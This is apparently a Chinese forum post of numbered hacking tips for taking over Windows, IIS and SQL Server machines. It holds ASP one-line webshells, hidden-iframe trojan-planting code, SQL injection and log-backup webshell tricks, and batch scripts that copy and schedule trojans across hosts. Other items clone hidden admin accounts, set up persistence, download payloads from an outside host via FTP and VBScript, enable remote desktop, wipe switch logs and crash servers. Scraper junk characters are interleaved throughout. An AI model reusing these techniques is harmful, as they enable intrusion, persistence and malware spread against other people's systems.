Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
" G" T4 O. z5 ^% ?cacls C:\windows\system32 /G hqw20:R
2 I# i: }4 {) r% S8 U$ a思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
' y7 Q. M6 Z. Q" K4 J: ~" @7 {0 E$ V恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
; N, U' _ u% u, r# n/ B0 v0 e' a0 L
7 ]6 V- f8 h- p+ M5 A2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
3 n5 w: i5 W4 N0 S, _) y5 D, P+ `
/ o& Q; E+ m f3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
: F! v3 U+ t4 d8 M; u1 O, m, r! K. T' z% Y
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
1 O* t8 H% g2 A- C' [
0 d/ }0 L1 \9 C- e: M4 a$ R, q" h. r2 ^5、利用INF文件来修改注册表
8 I! f2 R R3 A2 K[Version]
: D$ y' f& |4 K% s2 I, V( Y& b0 a) NSignature="$CHICAGO$"( k$ S& z3 X1 S
[Defaultinstall]4 i/ \' @1 G* V- P3 q% Y# I
addREG=Ating
5 ]7 T# [+ U% S' @$ D' s[Ating]# ]* d6 N0 @' e! ~. N
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"$ [. z+ }' V$ t5 {
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:- o* I7 {4 A7 `3 W) k
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
. r; q5 v- t# D' w5 i其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
/ D" [( h* [9 u% n4 Z+ z; {; ~HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU1 D* ^0 [5 g- y" u2 P/ [/ I$ p
HKEY_CURRENT_CONFIG 简写为 HKCC
" m* E3 d( P: h. r( C) j( Q6 w T7 a+ q0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值: V; G% }$ g q4 p4 c. _2 _7 E
"1"这里代表是写入或删除注册表键值中的具体数据7 A1 x( ]+ v- G
2 d3 K+ a4 F& S/ \, Y6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
3 s/ c+ G/ X* _( V* J" l1 A多了一步就是在防火墙里添加个端口,然后导出其键值
" k* P( N# A: }- l& P9 n[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]- `8 C# R8 O& O- \1 L+ X
/ a" I# f+ n" n
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
+ ]4 I; H3 D( y" K$ W0 ~3 w) q# H, h在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
# M/ a5 M, a d3 ]* h$ d6 d0 e# U8 }/ P- m
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。) V1 X# f/ ^$ G) u4 M) x5 N
& }4 ?7 S! y+ U: z/ P
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
& k2 Q8 q( ?0 T5 M5 C可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
j$ H2 F! j" O% {5 S" c! w- O- T6 ~ v7 Y
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
" A$ F% f' `, }+ D: S9 R Q: V; S9 v) v+ l
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
& e% G& y3 I( i9 L用法:xsniff –pass –hide –log pass.txt
+ p" O8 {. w- M2 h, A5 g# c- D4 U+ l3 H' a; f6 M: W& ^ @/ ?
12、google搜索的艺术' ^# v9 d" L4 P7 }6 y. `% B
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”4 t- H0 K4 c* Y% I3 ?" W# p
或“字符串的语法错误”可以找到很多sql注入漏洞。. x, Q) `" T; j- i; I; s
3 @1 Q2 s9 T% n/ q8 ]) g5 z# i13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
! {* X9 ~' l1 p
7 e% r; j8 Y6 i$ s9 L14、cmd中输入 nc –vv –l –p 1987
2 a+ h t# }0 i+ a+ d# n0 R; |做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
" G; L: b F7 c8 W
0 a6 A% U7 Q" G; K7 ?+ s15、制作T++木马,先写个ating.hta文件,内容为
0 w* I: g9 Y% v) d; B1 ?$ j<script language="VBScript">) ?3 k1 s6 W. n2 G0 _6 V/ Y
set wshshell=createobject ("wscript.shell" ), k8 |5 B) e3 s- l' J9 q$ v
a=wshshell.run("你马的名称",1)+ F0 z6 P; d) D7 z1 j; G
window.close) \8 ?/ D# }, E
</script>
* W& o# R, I; I7 g: V( Q再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
( V" A2 w7 Z" {" K e7 i3 Z" z, ^0 S; N* r# b
16、搜索栏里输入6 \: z O: v3 ?3 J: G: _* `
关键字%'and 1=1 and '%'='
3 T7 p% ]% A9 @- \7 Z8 U关键字%'and 1=2 and '%'='
6 `2 F% s0 l9 U" s比较不同处 可以作为注入的特征字符
Y8 H9 |* d& N3 r: N1 @
6 L c$ S9 {! U. c17、挂马代码<html>: r! L. {9 ^3 n1 s
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>, q: z5 h# p" e, |6 H- l$ m6 n
</html>
; ^, A8 ]4 K `8 y" S. z G% S1 }1 Z' t* `
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
& \9 m" z& v+ N4 ^8 Y( Fnet localgroup administrators还是可以看出Guest是管理员来。
) V0 x' ~1 \% ]1 T" c/ D& ]: t, d
3 V. A3 c* Y; E; a3 ` D19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
) M/ G8 N8 {, f1 @0 }$ p用法: 安装: instsrv.exe 服务名称 路径3 `4 V8 o0 b. a
卸载: instsrv.exe 服务名称 REMOVE9 q! f" v6 y2 s* d8 `
: c7 Y- R/ V7 c6 ]/ i: J$ [/ F% X/ m. {2 B: H
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
# B- R6 I+ w1 b% |- [不能注入时要第一时间想到%5c暴库。 ^: g# {, x6 i* K5 B
! G: P& v. A* E" F v) x
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
" v7 k. s: e" P: L4 G) Z# Z0 X4 x/ C7 B" x- p
23、缺少xp_cmdshell时
) `, t1 C) b% c& ]9 g" {- z/ n尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll': _" Y1 _3 K/ | ^
假如恢复不成功,可以尝试直接加用户(针对开3389的)
" a4 u3 \4 [, h Ndeclare @o int: \, l# R/ O+ U4 b: s5 J- M5 y
exec sp_oacreate 'wscript.shell',@o out- r: w# ^6 a# {# ~7 A
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
+ d7 P, v- ~" k/ @+ j. y5 m o1 j5 I
24.批量种植木马.bat
, n, A% Z( d Cfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
9 q7 j: h& D% S7 yfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
5 E8 C" S) H$ ?: h4 _& N! E; [扫描地址.txt里每个主机名一行 用\\开头
3 A5 g* E2 ~) Z) r. a2 w" Z& D( _% s2 D, m- C( z6 f5 z* ^
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
4 C0 X/ p+ n5 C+ ?' G1 r4 H, o3 n7 a2 K3 G. J- K
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
7 T( O5 R/ {! Z# v* F将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.7 d. j1 c0 a# ]" X. S6 H$ W
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马: Q; J0 l; u" N" N, l+ M
7 B$ x$ Q& v% A
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
4 M# q1 o3 f; i! k% |然后用#clear logg和#clear line vty *删除日志$ j% F& }' x+ K8 D7 K- W" u2 s" v
9 W9 |1 b2 B) {
28、电脑坏了省去重新安装系统的方法* x' O" g% K+ W# y+ Y$ X j& V
纯dos下执行,) L0 e( c- m. l& z, o8 o9 ^
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config& j+ A0 e0 r) x! {* B2 S
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
8 N1 a0 w' @7 E
' M7 }% L$ s. T29、解决TCP/IP筛选 在注册表里有三处,分别是:: |4 l* I' s" P" \: P! Y) K# e
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip' F5 \1 z4 }( q# V3 w. r4 O
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip+ k+ I6 ~, g L+ V
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip6 Q* Q9 W. U3 b9 N
分别用
2 F; Z" x4 [+ }4 e4 q5 lregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
1 P1 I1 T/ d7 d' x7 fregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
9 x1 D1 l' T2 g! F9 l+ Wregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip6 A0 [* T8 W/ w
命令来导出注册表项8 B* p; \- i2 P2 a7 y8 b0 w
然后把三个文件里的EnableSecurityFilters"=dword:00000001,5 k+ M7 H( F: Z- l# t4 ]. ?
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用* o7 @: j) }3 r2 ]8 g; ^7 z
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
+ N. I; D3 f$ x/ [1 v- B9 u: j1 G6 V& {* R, j7 `3 C
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U6 f- M( @/ L. E$ E- K8 E( {* P' T( Q
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的34 e( X R( b: B4 j% `! ^% }5 Z
$ t5 S" K1 E' f
31、全手工打造开3389工具
- `& R) R1 C+ h. ~3 q8 F$ G打开记事本,编辑内容如下:9 D+ e6 }! k1 ^# M) m
echo [Components] > c:\sql* I- \8 p: ^; ?8 X
echo TSEnable = on >> c:\sql
3 {3 Z/ }$ g9 dsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
4 h4 O0 Q. K5 w: x, F3 q6 f6 P4 |编辑好后存为BAT文件,上传至肉鸡,执行
! g$ Y) ?8 l: v: b" a! f1 h, z) n
* r" M& z) f" ]; \8 D) O1 Y32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马 [0 X$ Y* r y9 q0 H) Y
$ w9 ?/ {' F% n# S6 R33、让服务器重启
, ]3 F! ^% ]3 r5 l写个bat死循环:
4 S8 D, O5 _7 e' S/ i! H@echo off
+ w. x' I/ H g7 x' [ Z:loop1
2 l3 T+ z P9 t. j/ dcls2 a, S1 x& K) l8 D- ]" }+ l
start cmd.exe: D: e* A0 x# P1 Z+ S3 z
goto loop1
& [6 T& O$ t# p, C保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
" q( F# {6 h n( \" S' f+ b) y/ u4 Z0 j- @5 h. S
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
- K+ G! z3 T: i4 m0 o# F@echo off/ {( m3 E/ Y6 v+ a/ O
date /t >c:/3389.txt
- f" o: e' g2 j& ltime /t >>c:/3389.txt
3 W' e7 e& C9 r/ zattrib +s +h c:/3389.bat& L2 h6 `8 V1 g9 q3 Y8 b
attrib +s +h c:/3389.txt
8 s# S X5 B& [9 [netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt: e5 n6 E( H' @4 V$ T B1 d
并保存为3389.bat0 O9 V- j* _: ] ^4 L
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
! v* Q1 Z& ^- i' K ~) @$ d5 {/ ^$ z3 f
35、有时候提不了权限的话,试试这个命令,在命令行里输入:9 Z/ J$ e5 p* T$ o! l& a6 s' ^
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
3 L7 b# e6 Q2 W输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。6 F1 B0 w: T% U8 p$ @
+ q' _- [. N ]3 r6 c36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
0 p/ o6 r3 e* D ^echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
8 g3 {1 t2 e; ^! ~0 D# w0 gecho 你的FTP账号 >>c:\1.bat //输入账号
8 I- q* _, ]7 M$ t+ ?: l# B' Z1 j: jecho 你的FTP密码 >>c:\1.bat //输入密码5 c1 i" l( \' ]) W+ x- y
echo bin >>c:\1.bat //登入
G4 t( y/ {( j# xecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么, s; H4 z* M( N2 R7 }3 S' }8 F, ^& \
echo bye >>c:\1.bat //退出, v7 M- o3 y- O1 ?* `
然后执行ftp -s:c:\1.bat即可
0 N \1 b+ P0 L, ?0 v
' ^+ e; k/ ^# p8 Z- Y% ?+ N37、修改注册表开3389两法
3 C k P% I7 a0 k: k(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表( ?9 L+ T* B9 z5 T5 Z! B
echo Windows Registry Editor Version 5.00 >>3389.reg
) n$ q# z4 f# ~' O+ j' ]echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
2 o3 f3 H# k3 ~ U4 zecho "Enabled"="0" >>3389.reg' b, q* H7 [' ?- O4 O3 @
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows; N8 K: O! ?. F3 m
NT\CurrentVersion\Winlogon] >>3389.reg, M8 E" e, L4 M7 `/ w7 s2 i
echo "ShutdownWithoutLogon"="0" >>3389.reg
/ C9 e0 @$ z- decho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
7 o& U3 [! {6 V5 K$ f>>3389.reg: P- P* L; E [0 }3 _. g: Y
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg' C3 K6 b' N/ D8 i j3 o8 g
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
# h# O, N# r w( v8 o>>3389.reg
! g5 y) q' B* ~2 ?echo "TSEnabled"=dword:00000001 >>3389.reg |) c: D' U; T
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
' ?. J! t/ _5 z& p3 \* u# Yecho "Start"=dword:00000002 >>3389.reg0 d- {. N- }4 V) F8 W& V
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]6 ?) o! R* l% ~$ O% `, s3 h& r
>>3389.reg
- p& E, \& C( r" q- U: g8 x9 E! yecho "Start"=dword:00000002 >>3389.reg
, j8 M% n' s3 J# p( c5 ~echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg# e6 I$ Q# b: F# Y: _" ?( o
echo "Hotkey"="1" >>3389.reg
Y/ ~) w4 {+ m5 r; z; D- E! Cecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
5 D: _3 X8 b9 ^Server\Wds\rdpwd\Tds\tcp] >>3389.reg1 t/ F1 H! _* c; {
echo "PortNumber"=dword:00000D3D >>3389.reg/ g4 c8 E. S0 R$ G7 C! M
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal3 B) E; X% \0 J( V. f) U7 F O1 f* ]
Server\WinStations\RDP-Tcp] >>3389.reg3 T# ?# d% \' k+ t
echo "PortNumber"=dword:00000D3D >>3389.reg# \) R! S8 l" C i# k8 W" A
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。& Q( U, S; Q( v( t8 ?/ W+ ^
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
R% }$ i/ ^, s, L因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
+ A+ q% K2 h$ g% S: U: y. I(2)winxp和win2003终端开启
9 m: x9 t9 Z) L$ d用以下ECHO代码写一个REG文件:
8 ]* \" L" c( Y/ z6 |/ R4 S* Aecho Windows Registry Editor Version 5.00>>3389.reg, |& K" u; Y( C: z' x T
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal; H$ G7 x: i' g
Server]>>3389.reg
7 ~! K! g8 r1 z) Jecho "fDenyTSConnections"=dword:00000000>>3389.reg$ A w& z/ }. D- C# D
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal6 h1 E! {6 }% s# ?& v/ F* R6 s
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
) C" T6 n8 a! f' z9 u7 n5 Xecho "PortNumber"=dword:00000d3d>>3389.reg, |( k( P6 g9 o8 }" C U2 u
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
& @ ?% m5 L* X4 w- y$ U; @; q0 mServer\WinStations\RDP-Tcp]>>3389.reg+ t9 J( ]9 j, W& s' E
echo "PortNumber"=dword:00000d3d>>3389.reg
2 I. r. s+ q! |# p然后regedit /s 3389.reg del 3389.reg6 _. X) \* `) R
XP下不论开终端还是改终端端口都不需重启
_8 |3 R5 Z# }+ o( I R: R* I, F2 }- W; o
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
5 {( A% J$ c. ^# K. E& O6 t- `, V用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'3 U) T+ ]: m D3 q
# L/ v+ F1 E2 k( \. P7 G, U
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的! d% N$ G! t8 w7 p8 n2 t; D5 R
(1)数据库文件名应复杂并要有特殊字符* ?6 M" y8 P5 {' c4 Q' i! E) b
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源1 {1 Y! q6 h. m
将conn.asp文档中的2 e8 K' F1 ^2 Z, a# _# z; e- t
DBPath = Server.MapPath("数据库.mdb")4 r( u' W) m: o
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath" f7 P! [. j7 e
& j y; c- Y% q( E$ w- G修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
* z6 E0 [' y, Y(3)不放在WEB目录里9 l6 R6 u0 z/ A: s* _% e, m+ i
# a6 B& _5 O7 x6 U: C40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉" B' @ X6 k; P/ Q
可以写两个bat文件( g/ g" ` V4 A" A& L9 B" t
@echo off
+ m. p* ]7 o$ Z% `" `5 B@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe. Y8 O3 k* |* V: h3 K
@del c:\winnt\system32\query.exe
4 ]5 m% S. R, ?# `. \* J@del %SYSTEMROOT%\system32\dllcache\query.exe
$ ]; F* X- j( S( |@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
6 _" u8 T; K6 H; j; P4 Y8 P$ N" Q
4 ? u( J( H) q0 x@echo off: d3 V3 Y7 h9 e# t4 k( a' A' o
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe2 J- w2 R- m( c
@del c:\winnt\system32\tsadmin.exe
; @9 ~/ i+ F. `4 E( }. t# s@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex- y9 _! d* T. E6 C* d, l
1 Q9 z& ?3 W1 ]) b( P3 x
41、映射对方盘符
6 D0 C8 F2 l3 |: Q' z* Ptelnet到他的机器上, y4 l. R: S, o
net share 查看有没有默认共享 如果没有,那么就接着运行6 y0 P I1 i9 ]7 S7 Z/ Z
net share c$=c:" U1 m" p g4 ~! r7 _8 M( l
net share现在有c$
. F, N0 X' D; c6 ]- h在自己的机器上运行) B; k$ P Q6 f" W2 \
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
9 V$ c. ?( }! u, x( }& _
/ G {' ]: ?8 J! F; |42、一些很有用的老知识/ U7 |+ w8 N( z
type c:\boot.ini ( 查看系统版本 )0 Y" B( S% B5 G2 d: t, @0 C1 L
net start (查看已经启动的服务)$ y3 M. ?; z( C/ @3 C: V& v( X! x
query user ( 查看当前终端连接 )
5 N5 C7 m, ~" f" @2 Z Snet user ( 查看当前用户 )
. r5 V0 f7 C$ F* cnet user 用户 密码/add ( 建立账号 )8 R% d7 M6 N6 {
net localgroup administrators 用户 /add (提升某用户为管理员) M3 V' x+ Y% [1 }( m
ipconfig -all ( 查看IP什么的 )
# _9 I! i5 {+ t% @3 z3 y. j, wnetstat -an ( 查看当前网络状态 )
5 w; Q z& k8 b$ V9 `* a+ Yfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
9 u z4 v( X) e% m% [. T8 w; ?克隆时Administrator对应1F42 f, A l- L$ M+ H* R
guest对应1F5# D: g4 a; Q1 r8 y( ]3 R
tsinternetuser对应3E8
$ K/ ^5 W; c, O& _% X4 z
9 y5 o, i+ P& \' Y( z/ [) }43、如果对方没开3389,但是装了Remote Administrator Service5 f7 j" \" R5 `' |6 u% v
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
: \! H9 ^6 B1 n1 P解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
& u8 L# n' D6 a先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"* U% g/ x1 b" n s
1 U, ]( [3 Q* i, o8 j* K% n44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)" @; @: A% f' K% J& X
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口), n9 M9 l& N& l9 {# ^
$ C" ^- ]/ s) x5 m* H
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
& C- {# V9 e1 c# kecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
6 y3 a4 k8 ?4 M% i2 {% F- L^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =6 v- F0 G. l0 y6 H$ H
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =1 v# s0 J. O' w% E& N1 c. w
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
- D8 Z# S F* V; |! J3 t(这是完整的一句话,其中没有换行符)
+ }" C9 g4 N* K( O7 ]6 L3 K0 u8 B然后下载:
7 O0 F5 p) R* `9 a* N! Fcscript down.vbs http://www.hack520.org/hack.exe hack.exe' T+ a% I: O% s& V8 @* Y
; \( k0 o6 z7 {* u4 ?+ [6 e5 q46、一句话木马成功依赖于两个条件:
$ J/ S& t) O4 Z% f: t& h1、服务端没有禁止adodb.Stream或FSO组件
1 b) v+ j/ i6 L9 {1 R) ?2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
% x5 ?, |5 @$ w& H. K4 X% K8 F. j/ L, S5 G7 A0 s# h4 X M
47、利用DB_OWNER权限进行手工备份一句话木马的代码:( }, g% T5 i9 q/ |" d! u
;alter database utsz set RECOVERY FULL--+ Q+ N- K" \1 w r# d* u
;create table cmd (a image)--) `+ r' e$ y- a' ~0 _
;backup log utsz to disk = 'D:\cmd' with init--; O" o/ d- C6 Z3 }5 P: X0 E/ r; D* P7 j5 x
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
. E& t# {) u$ P3 ~. }# R: j;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--) E8 p# K9 _" O
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
" g8 d! Z9 V7 R. k8 d% R, _2 X! `7 m
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
0 ~. B: ]& W8 i- w9 Z/ V& P8 H a* f' c2 w+ W
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options8 ^1 u& s' N, a( ~9 I& D
所有会话用 'all'。: V1 @3 B6 F$ x
-s sessionid 列出会话的信息。" T- A( ]# X/ E: U( h" P5 i* ^: o
-k sessionid 终止会话。
$ n* D3 M3 M' S9 Z& J" H-m sessionid 发送消息到会话。; N6 l, d% r0 i) b. U2 P7 O
& `6 z8 w, A0 z; n0 w4 h+ Wconfig 配置 telnet 服务器参数。- f- M- h2 z3 @# {$ X9 S
5 g6 H- B& r3 Q) C3 I( q' W! ^/ b
common_options 为:3 A6 v% r! J8 e. i; \3 J
-u user 指定要使用其凭据的用户" x1 m% C! X; s, m) `6 Q0 |3 N
-p password 用户密码
9 ~7 Q2 u; \2 ]6 c2 q E
9 l+ u. d$ @& ~/ O" m3 Iconfig_options 为:6 V9 y; v% Y0 T
dom = domain 设定用户的默认域5 l4 r- g3 v' Q- v/ d! p2 H" j
ctrlakeymap = yes|no 设定 ALT 键的映射
; Z* w% R, R! X0 F( j1 ctimeout = hh:mm:ss 设定空闲会话超时值
: |6 C v5 R& s0 m5 ?* V& atimeoutactive = yes|no 启用空闲会话。
' b/ [# j0 E# j" s( smaxfail = attempts 设定断开前失败的登录企图数。
7 _, X1 w/ k+ J; [maxconn = connections 设定最大连接数。3 {* e, D+ C& M/ h
port = number 设定 telnet 端口。
2 P% A0 P6 q9 D' d) [! Y* dsec = [+/-]NTLM [+/-]passwd
3 u8 f- H) X4 Y设定身份验证机构( J, X4 M: F0 c. M! {* U. C/ |
fname = file 指定审计文件名。
' l+ U' x8 Q5 y9 k$ q4 `8 @fsize = size 指定审计文件的最大尺寸(MB)。
, a w2 j9 o4 D& A" ?/ F0 emode = console|stream 指定操作模式。
# F( N4 a* [0 Uauditlocation = eventlog|file|both W% d; D2 i) h
指定记录地点& W4 r2 v7 W+ X. @) y
audit = [+/-]user [+/-]fail [+/-]admin$ Z6 d2 _4 S& W* D0 Y- U% _
% Z; d O2 C/ ^( b
49、例如:在IE上访问:7 U: H8 H; X8 o2 z& O# k0 ], P
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/ n% o( I) o' a( K
hack.txt里面的代码是:- {& A) n: E4 p v, l* B
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">6 o; k% s6 e* V9 u* r# \! C/ X
把这个hack.txt发到你空间就可以了!
: P' K) k c, M. ^6 u% G/ R这个可以利用来做网马哦!* o9 N9 N+ v. T& ]9 w3 g1 s( D
( n1 T7 @4 g+ h% L `
50、autorun的病毒可以通过手动限制!6 K5 U- x: A2 {+ C8 g5 ]
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!7 s4 t1 D, c; s# }; B/ v6 z2 \3 j
2,打开盘符用右键打开!切忌双击盘符~
0 }/ V% g+ c9 Z' {3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
" l9 ?* J# q, t' q. i6 [- O$ f- K( p
51、log备份时的一句话木马:6 R$ S6 N; f% v+ m
a).<%%25Execute(request("go"))%%25>/ [# v+ ]# `5 c8 ?2 ^5 y
b).<%Execute(request("go"))%>5 ~9 H0 N9 K( z* L' ^6 z
c).%><%execute request("go")%><%
" y: ~4 [6 g# p! B/ {. @d).<script language=VBScript runat=server>execute request("sb")</Script>8 H8 |7 k6 I- h
e).<%25Execute(request("l"))%25>" f; d# s; H/ x' N. n$ J, n |) G
f).<%if request("cmd")<>"" then execute request("pass")%>
8 s) T7 k' @* m* V
' X5 P6 L4 O! {52、at "12:17" /interactive cmd
2 M, K- i ^! l' K执行后可以用AT命令查看新加的任务
